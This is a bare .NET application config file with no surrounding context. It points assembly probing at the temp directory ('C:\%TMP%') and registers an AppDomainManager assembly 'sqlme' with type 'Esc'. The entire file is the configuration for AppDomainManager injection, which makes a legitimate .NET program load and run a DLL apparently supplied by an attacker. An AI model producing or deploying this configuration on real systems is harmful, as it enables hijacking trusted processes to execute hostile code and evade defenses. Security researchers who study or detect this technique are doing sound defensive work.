	<configuration>
	<runtime>
	<assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
	<probing privatePath="C:\%TMP%"/> </assemblyBinding>
	<appDomainManagerAssembly value="sqlme, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null" />
	<appDomainManagerType value="Esc" />
	</runtime>
	</configuration>
